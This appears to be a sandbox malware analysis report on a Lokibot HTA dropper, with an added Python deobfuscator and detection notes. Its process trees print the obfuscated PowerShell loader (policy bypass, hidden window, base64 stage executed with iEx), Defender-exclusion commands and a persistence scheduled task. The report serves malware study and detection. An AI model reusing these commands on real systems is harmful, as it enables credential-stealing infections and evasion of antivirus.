Analysis Overview
SHA256
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0
Threat Level: Known bad
The file greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta was found to be: Known bad.
Malicious Activity Summary
Lokibot
Lokibot family
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Evasion via Device Credential Deployment
Blocklisted process makes network request
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
outlook_office_path
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 07:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 07:19
Reported
2024-11-20 07:21
Platform
win7-20240903-en
Max time kernel
119s
Max time network
125s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2844 set thread context of 2216 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
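The first pOweRShelL.EXe command line above is worth pulling apart, because the same construction appears verbatim in behavioral2. The argument is a single quoted string that PowerShell runs as its command text: a first statement (`PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment`) launches the second, hidden powershell.exe seen on the next line, and after the `;` an inner `iEX` evaluates a string assembled from `'...'` pieces and `[cHAR]NN` tokens (58 is `:`, 34 and 0x22 are `"`), yielding `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))`; its return value, the decoded stage 2, is then executed by the outer `iEx`. The following deobfuscator is an added example, not part of the sandbox report: because the base64 blob is redacted on the page, `SAMPLE_CMDLINE` is rebuilt from the reported command line with a constructed stand-in payload in its place, and everything else (the `-EX`/`-nOP`/`-W`/`-c` expansion, the `[char]` resolver) is mine.

```python
"""Deobfuscate the layered PowerShell one-liner from the process tree above.

Added example, not part of the sandbox report. The stage-2 base64 blob is
redacted on the page, so SAMPLE_CMDLINE is reconstructed from the reported
command line with a CONSTRUCTED stand-in payload in its place.
"""
import base64
import re

# Stand-in for the redacted base64 payload (constructed; not the real stage 2).
STAND_IN_SCRIPT = "Write-Output 'stand-in stage 2 (constructed for this example)'"
STAND_IN_B64 = base64.b64encode(STAND_IN_SCRIPT.encode("utf-8")).decode("ascii")

# Command line as reported, with only the redacted blob replaced.
SAMPLE_CMDLINE = (
    r'"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" '
    r'"PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; '
    r"iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'"
    r"+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'" + STAND_IN_B64
    + r"'+[cHaR]0X22+'))')))" + '"'
)

# powershell.exe accepts any unambiguous prefix of a parameter name, which is
# what the sample relies on; WindowStyle 1 is the ProcessWindowStyle.Hidden value.
_FLAG_NAMES = {"ex": "ExecutionPolicy", "ec": "EncodedCommand", "nop": "NoProfile",
               "w": "WindowStyle", "c": "Command"}
_WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}
_FLAG = re.compile(r"(?<!\S)-(ex|ec|nop|w|c)(?=\s|$)(?:\s+(?!-)(\S+))?", re.IGNORECASE)
# One piece of a PowerShell string concatenation: a single-quoted literal
# (no '' escapes handled; none occur here) or a [char]N / [char]0xN cast.
_PIECE = re.compile(r"'([^']*)'|\[char\](0x[0-9a-f]+|\d+)", re.IGNORECASE)
_B64_CALL = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)


def launch_flags(cmdline):
    """Expand the abbreviated powershell.exe switches to their full names."""
    flags = {}
    for m in _FLAG.finditer(cmdline):
        name, value = _FLAG_NAMES[m.group(1).lower()], m.group(2)
        if name == "WindowStyle":
            value = _WINDOW_STYLES.get(value, value)
        flags[name] = value
    return flags


def inner_expression(cmdline):
    """Return the argument text of the innermost iex( ... ) call."""
    starts = [m.end() for m in re.finditer(r"iex\(", cmdline, re.IGNORECASE)]
    if not starts:
        raise ValueError("no iex( call found")
    start, depth, in_str = starts[-1], 1, False
    for i in range(start, len(cmdline)):
        c = cmdline[i]
        if c == "'":
            in_str = not in_str          # parens inside quotes do not count
        elif not in_str and c == "(":
            depth += 1
        elif not in_str and c == ")":
            depth -= 1
            if depth == 0:
                return cmdline[start:i]
    raise ValueError("unbalanced parentheses in iex( call")


def resolve_concat(expr):
    """Evaluate a '...'+[char]N+'...' concatenation without running PowerShell."""
    out, pos = [], 0
    for m in _PIECE.finditer(expr):
        gap = expr[pos:m.start()].strip()
        if gap not in ("", "+"):
            raise ValueError(f"unexpected token between pieces: {gap!r}")
        out.append(m.group(1) if m.group(1) is not None else chr(int(m.group(2), 0)))
        pos = m.end()
    return "".join(out)


def decode_stage2(cmdline):
    """Return (reconstructed inner expression, decoded stage-2 script text)."""
    expr = resolve_concat(inner_expression(cmdline))
    m = _B64_CALL.search(expr)
    if not m:
        raise ValueError("reconstructed expression has no FromBase64String(...)")
    return expr, base64.b64decode(m.group(1)).decode("utf-8")


if __name__ == "__main__":
    print(launch_flags(SAMPLE_CMDLINE))
    expression, stage2 = decode_stage2(SAMPLE_CMDLINE)
    print(expression)
    print(stage2)
```

Two caveats for anyone turning this into detection. The recorded image path is under SysWOW64 even though the command line names sYStem32: the launching mshta.exe is the 32-bit one, so WOW64 file-system redirection silently substituted the 32-bit PowerShell host, and a rule keyed on the image path must accept either directory. And the bare word passed via `-c` to the second powershell.exe is not a cmdlet; it is a junk token (the sandbox names it in its "Evasion via Device Credential Deployment" signature), so that child process does nothing useful but still fires the hidden-window/bypass pattern.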
Network
| Country | Destination | Domain | Proto |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 9a5f8f28cd7be7a84d1d0cf33bac967f |
| SHA1 | d3f2b64909980123efdb7077997b8fb7df2bd841 |
| SHA256 | 01f303a121024bbf0992561d9323bf218cddd617d82aea5d862c12da974bdafd |
| SHA512 | 3226321cd441392715cafd9f0909048ccc3003d747625e20b0631f3ef2eed89248c5bdfcd4cb0c6256a830c1b6653a64dfdf78ceb215fffbf7d5f9aa1512434f |
\??\c:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline
| MD5 | 5423583de2ddb787508e3d60ef57237d |
| SHA1 | 9ae2c941350820f705adced6f8d7327de8aa56a9 |
| SHA256 | 3a75ab620ed0a503c47f6d8843b5c224525f67fe9ed28f54561043a650a43cd1 |
| SHA512 | 39a84d9ec48bffcef7d6b50adfcb1f18dadd7a6366e76a56415c222dfcde2ed82cabc7f8e46230f4873e11655d79ea4d9374e70f2ffd5e1aa98e1ba02b1ff7ec |
\??\c:\Users\Admin\AppData\Local\Temp\yygz-_yf.0.cs
| MD5 | fe82050659a8b97690d60529499222c1 |
| SHA1 | 7cc50135852b46dd1e36f2ff98506613db525a68 |
| SHA256 | 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a |
| SHA512 | 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f |
\??\c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp
| MD5 | df2a95e4185073c5332d6df93099c54e |
| SHA1 | 73414dc5dda05bdcae60ad1a0ee19821dfb06088 |
| SHA256 | 4be699c85a59f2bfeca2f059afbd77573231bae4947bde88c5bd9db246494670 |
| SHA512 | cf13d791464125af71aa959634674bf5e6abe80a09493683d5fd1cb78cbc0f22e4f3034552bd0971b84216cb0ce72b526e8e8e31d2f1aa15ced80a14b5700a4a |
C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp
| MD5 | 3112e1b1ad9c31faa74f1c23fa539356 |
| SHA1 | a4ca1a7c6858078749fbb53e96452563c6a6e2d4 |
| SHA256 | c5e3ca49a654c74b23b45b9c10bd52a07074f089296d7f238c07f70e59df95f2 |
| SHA512 | e6d8b36b949240b2176608cde7391db5aa2bfa02926be81777b3969970b6f2a83208185e3398377cfd53c3f0483665f4ef35a2b46aeb0b08204503d581b20626 |
C:\Users\Admin\AppData\Local\Temp\yygz-_yf.dll
| MD5 | 63b7c94192c91c41ed9599d4027f1864 |
| SHA1 | 2f729fbeef93d95f38291ff15a4f2a1e8abfe46f |
| SHA256 | f44cf0ee89deea2b92ceb23342473d7bfef4f86be796ad4426f263aaf09795ed |
| SHA512 | b11e3dafe861af2947c600261889f6b7985bfaee5e73925444e8edd779e0988fc000bb8f875d6bc49431e295dfc57559f58eb3d0de2afedf8eb744f2620165d8 |
C:\Users\Admin\AppData\Local\Temp\yygz-_yf.pdb
| MD5 | a45938611a6990e0538f54be4863c634 |
| SHA1 | 661d7dc529ae744893df27e5d2d89135a7976434 |
| SHA256 | 8d76319dd56ad6740350d97cadcc4353a8b5565687dd1e0e0b5fde43eec4ecdf |
| SHA512 | a73e7d284d259e94c3a70a4fed37b6a659327bbe3fc0d6838db63a9170e521d7032f9eaec1eec9a8b69d841448a5b2daea15882d9134d5090410958aef66ea1b |
\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 74061922f1e78c237a66d12a15a18181 |
| SHA1 | e31ee444aaa552a100f006e43f0810497a3b0387 |
| SHA256 | 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c |
| SHA512 | 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136 |
memory/2844-44-0x0000000001250000-0x00000000012E8000-memory.dmp
memory/2844-45-0x0000000000340000-0x0000000000352000-memory.dmp
memory/2844-46-0x00000000052A0000-0x0000000005304000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 35fa34d8e175aca60aa63d5c0bbba04d |
| SHA1 | 2b12ff28f32f3cfd7e102c55b77efef53086784c |
| SHA256 | 3436cbceb57520feca975a98b44df7f33c453560b3f8f9f7103fe7f327a23051 |
| SHA512 | 8028b4c926e3fc56ac7649c15cf1824071296c2ca48d399b27a7841a9dc645da791fed16081abbb690835badf20b5909ad9c3f101752a1b9b00dffeeb618a53f |
C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp
| MD5 | 644acd672def50f90420e4f03528d496 |
| SHA1 | 03ddd4937e44f36e9cfbfd97812b8f0cd44fef73 |
| SHA256 | f0200586128367b78d108181914aee71aa5e921161c36921a9f98d291f86c2bf |
| SHA512 | 31ff4b7640c0a06e83741a132413b4bf85773d14b0a7a5a12306339f76b2fa4a66aa3934bca47ba4a6639ad7861a94c689a4d907ed81c5182e6d551d451bcac3 |
memory/2216-62-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-68-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-66-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-64-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-75-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-73-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2216-70-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
memory/2216-95-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-103-0x0000000000400000-0x00000000004A2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 07:19
Reported
2024-11-20 07:21
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
159s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1736 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDAB0.tmp" "c:\Users\Admin\AppData\Local\Temp\5jeux4ci\CSC8265DFDF4E4A4F1DACE6C6829FB3C9F8.TMP"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
